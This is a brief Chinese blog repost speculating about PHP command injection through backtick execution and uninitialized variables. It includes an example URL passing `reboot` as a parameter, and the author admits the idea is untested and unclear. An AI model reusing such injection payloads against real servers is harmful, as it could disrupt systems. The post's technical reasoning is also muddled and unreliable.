PHP漏洞挖掘的一点思路

2022-9-24 10:14| 查看: 2104 |来源: 互联网

$now1 = `date`; echo "Now date is: $now1"; ?> /* 利用PHP的反引号` (不明白的自己查资料反引号"`"的作用) 如果 $sec 变量未赋初 ...

$now1 = `date`;
echo "Now date is: $now1";
?> /*
利用PHP的反引号` (不明白的自己查资料反引号"`"的作用)
如果 $sec 变量未赋初值，可能导致 shell_exec 执行系统指令
*/

echo "$sec"; // 同理这个也可能. echo $sec;
?> EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
这样只会把 $sec 当作变量来处理，需要适当的变通一下。。。今天翻书时无意间发现的，还没测试，有兴趣的朋友可以研究下。 PS:
变量在内存中初始化,一直保存在内存中。未unset, 就可以读取!

tag标签:PHP漏洞

本文最后更新于 2022-9-24 10:14，某些文章具有时效性，若有错误或已失效，请在网站留言或联系站长：17tui@17tui.com

·END·

站长网微信号：w17tui，关注站长、创业、关注互联网人 - 互联网创业者营销服务中心

免责声明：本站部分文章和图片均来自用户投稿和网络收集，旨在传播知识，文章和图片版权归原作者及原出处所有，仅供学习与参考，请勿用于商业用途，如果损害了您的权利，请联系我们及时修正或删除。谢谢！

下一篇：实例讲解Cookies欺骗与session欺骗入侵 上一篇：数据库挂马的简单教程

17站长网微信二维码

始终以前瞻性的眼光聚焦站长、创业、互联网等领域，为您提供最新最全的互联网资讯，帮助站长转型升级，为互联网创业者提供更加优质的创业信息和品牌营销服务，与站长一起进步！让互联网创业者不再孤独！

扫一扫，关注站长网微信

PHP漏洞挖掘的一点思路

大家都在看

相关分类

热门排行

最近更新